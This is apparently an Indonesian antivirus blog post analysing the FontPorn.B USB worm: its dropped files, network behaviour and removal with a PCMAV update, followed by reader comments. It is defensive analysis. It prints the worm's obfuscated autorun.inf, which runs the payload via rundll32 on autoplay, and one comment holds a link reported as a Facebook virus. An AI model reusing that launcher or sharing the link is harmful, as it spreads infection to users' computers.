Home > Analisa Virus, Antivirus, Pengumuman > FontPorn.B: Please Upgrade To a Modern Software

FontPorn.B: Please Upgrade To a Modern Software

September 26th, 2011 Leave a comment Go to comments

FontPorn.B. Masih ingat dengan worm yang iconnya mirip sebuah file font?, FontPorn yang pernah di bahas kini datang lagi dengan pola penyebaran dan teknik yang hampir sama. Nyaris tidak ada perbedaan dari varian sebelumnya. Yang menarik adalah, berbeda dengan FontPorn.A yang mengakses sebuah website yang berasal dari Ukraina/Ukraine, kali ini website yang berasal dari Romania.

A. Info File
Nama Worm : FontPorn.B
Asal : Romania
Ukuran File : 62.5 KB (64,000 bytes) / 64.0 KB (65,536 bytes)
Packer : ~
Pemrograman : Microsoft Visual C++ ver. ~6.0~7.10
Icon : Font File
Tipe : Worm

B. About Malware

FontPorn.A pernah di bahas di link berikut : http://virusindonesia.com/2011/05/24/font-porn/ , laporan akan adanya virus dengan icon font yang gejalanya mirip  infeksi FontPorn, pertama kali kami dapatkan dari forum virusindonesia.com (http://virusindonesia.com/forum/viewtopic.php?id=1086) dan sampelnya kami dapatkan dari salah satu user yang berasal dari Surabaya. Selain itu, kami juga mendapatkan sampel dari Pekan Baru dan Riau. Hal ini menandakan bahwa worm FontPorn ini masih menyebar Indonesia.

C. Companion/File yang dibuat

Tidak jauh berbeda dengan varian sebelumnya, FontPorn membuat Host di folder Temporary
C:\Documents and Settings\Administrator\Local Settings\Temp\srv****.tmp (*** berisi angka acak, file ini sebenarnya merupakan file DLL)

Dan beberapa shortcut di Removable Disk :
– myporno.avi.lnk
– pornmovs.lnk
– setup1911.lnk

Autorun.inf, yang isi sourcenya terdiri dari beberapa karakter acak:

[AutoRuN]
AcTIon=OPeN
tostpqxvrjomspfti=nqrpswtrveposhyrvbvlpdmecbrnqsdw
icoN=%WIndIr%\SYsTem32\shELl32.dll,4
qguvwxwcrurfmlq=bqomtnxycqgkjdwovpppdri
USeAUtOPlaY=1
yhmprvxmaexaymhlkyuekgrqwyue=dgdthyfaxieuovqb
open=RunDLl32.exE SeTuP1911.foN,29dcC
dmcxuoyhxfu=rjhjwhlrmtusiwnvkovlxdmvggieoflt
sHeLl\exPLOrE\cOmmaND=RuNdll32.eXe SEtuP1911.FON,29DCC
lglhxb=sekxuadigguiboukpwqmoxikgmgggwqowsh
SheLl\opeN\cOMMand=RUNdll32.ExE setuP1911.FoN,29Dcc
ordshvveeefgmb=qwycdgrawtyymtscusyc

Yang ditampilkan pada AutoPlay adalah:

Dan yang terakhir adalah host yang dibuat nantinya akan dipanggil oleh shortcut atau autorun.inf dengan nama:
– setup1911.fon

D. Hasil Infeksi
1. Mencoba menyebar melalu jaringan dan menginfeksi komputer yang terhubung dengan jaringan tersebut.

2. Mencoba mengakses suatu website melalui porses svchost.exe atau spoolsv.exe dan melakukan pengiriman paket data tanpa sepengetahuan user.


Mengakses website melalui svchost.exe


Mengakses website melalui spoolsv.exe


Mengirimkan data paket ke website yang dituju.

3. Jika user dengan sengaja membuka Alamat yang diakses oleh FontPorn.B, maka user akan diminta untuk mendownload sebuah file dengan alasan browser yang sedang digunakan harus di-update. File yang di download tidak lain ada companion dari FontPorn.B sendiri.

tampilan website yang dituju oleh FontPorn.B


Tampilan Download Security Warning jika user mencoba mendownload file tersebut.


setelah diperhatikan lebih jauh, ternyata di dalam source code halaman website terdapat copyright pembuatnya. Serta pesan yang tidak ditampilkan.

E. Pembersihan

PCMAV 5.5 Update Build2

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.5 Update Build2 telah hadir dengan penambahan 52 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.5, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 5.5 Update Build2:

ErrorLove.vbs
ErrorLove.vbs.inf
ErrorLove.vbs.txt
FBSurprise
FBSurprise.drp
FBSurprise.exe.A
FBSurprise.exe.B
FBSurprise.job.A
FBSurprise.job.B
FBSurprise.jpg
FBSurprise.tmp.A
FBSurprise.tmp.B
FBSurprise.tmp.C
FontPorn.B
FontPorn.B.exe.A
FontPorn.B.exe.B
FontPorn.B.lnk
FontPorn.B.tmp
NgrBot.A.dat.variant
NgrBot.A.drp.A.variant
NgrBot.A.drp.B.variant
NgrBot.A.drp.C.variant
NgrBot.A.exe.A.variant
NgrBot.A.exe.B.variant
NgrBot.A.inf.variant
NgrBot.A.lnk.variant
NgrBot.A.variant
NgrBot.B.inf.variant
NgrBot.B.variant
NgrBot.C.variant
NgrBot.D.variant
NgrBot.E.variant
NgrBot.F.variant
NgrBot.G.variant
NgrBot.H.variant
None
Romantic
Romantic.inf
SmallSmile.vbs
SmallSmile.vbs.inf
TODO
TODO.drp
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat
X-Sample.vbs.C
X-Sample.vbs.C.inf
X-Sample.vbs.C.ini
X-Sample.vbs.C.mp3

Categories: Analisa Virus, Antivirus, Pengumuman Tags:
  1. yoyo
    September 26th, 2011 at 23:01 | #1

    wah mantab ki…
    update lagi….

  2. Indra
    September 27th, 2011 at 00:00 | #2

    Kedua…
    Mantap. Kapan ya sample dari saya di buat cleanernya? sudah banyak menyebar di tempat saya.

  3. Almi
    September 27th, 2011 at 13:02 | #3

    virus .. Aoutorun.INF kok blum bisa di musnahkan kenapa nih??

  4. Almi
    September 27th, 2011 at 13:03 | #4

    yoyo :
    wah mantab ki…
    update lagi….

    Cuman belum bisa basmi virus .. Aoutorun.INF

  5. Wisnu
    September 27th, 2011 at 14:31 | #5

    Kok belum bisa detect setup1911.fon. Lagian file tmp lokasinya berubah di C:Windows\temp

  6. michi
    September 28th, 2011 at 10:59 | #6

    @Wisnu
    mungkin varian model baru gan, diskusiin aja di forum, bagian malware, biasanya diminta sampelnya biar dibuat antinya

  7. gandhung
    September 28th, 2011 at 19:20 | #7

    salut kepada tim PCMAV

  8. X-sampl3
    September 29th, 2011 at 16:54 | #8

    keren bener dahhh… ukraina.. ko bisa sampe indonesia ya?

  9. Hernandez
    September 29th, 2011 at 19:46 | #9

    @Almi
    autorun.inf bukan merupakan sebuah virus, namun script yg d manfaatkan oleh virus agar bisa auto berjalan ketika removable media dipasang…
    coba baca klik 2x dari file autorun tersebut, kemudian abaikan huruf yg berserakan… cari lah kata2 yg menunjukkan sebuah lokasi direktori…. nah d sana lah sebenarnya virus yg asli berada. kemudian submit sample tersebut kepada TEAM PCMedia

  10. kresna
    September 30th, 2011 at 14:48 | #10

    tolong dicari apakah link ini mengandung virus
    http://i23.epicfilehost.com/g.php?7l4n4-Picture05.JPG

  11. prayitno
    September 30th, 2011 at 15:05 | #11

    Kalo browsing-2 coba pake Browser Comodo Dragon bos, semoga bermanfa’at…

  12. Indra
    September 30th, 2011 at 21:16 | #12

    @kresna: itu virus FB. Makasih telah melaporkan.

  13. dharma
    September 30th, 2011 at 22:32 | #13

    wah ada virus porno juga ya….

  14. mang_user
    October 1st, 2011 at 02:44 | #14

    Weihhh lokasinya seperti hackerville … ngak kuku kayak playboy.. playboy 7 icons (TjDown to Explorer Porno)

  15. A.rahman
    October 2nd, 2011 at 20:48 | #15

    pcmav tidak dapat berjalan lancar di windows xp service pack 3.
    tlong bug report yang telah saya krm di email fajar bisa langsung di analisa agar pcmav versi slnjtnya tidak ada bug sprti itu lagi.

  16. Barak Siaga
    October 4th, 2011 at 12:56 | #16

    PCMAV 5.4 & 5.5 tidak berjalan dg normal di windows SP3 ( jk PCMAV aktif maka program lain tidak berjalan seperti MSword dll,- jk PCMAV disable program lain baru ber jalan )…kenapa ya..?? Mohon penjelasannya..trims

  17. guest
    October 4th, 2011 at 15:38 | #17

    ============================
    sloki

    t31695
    ============================

  18. バデラ
    October 4th, 2011 at 16:52 | #18

    @baraksiaga: hm benar juga tetapi disaat saya make di winXP SP3 di komputer lamaku malah kebalik, pas didisable pcmav malah program lainnya error dan gak bisa online (harus log off baru bisa OL lagi).. o.oa tapi di win 7 ultimate sp 1 malah gpp.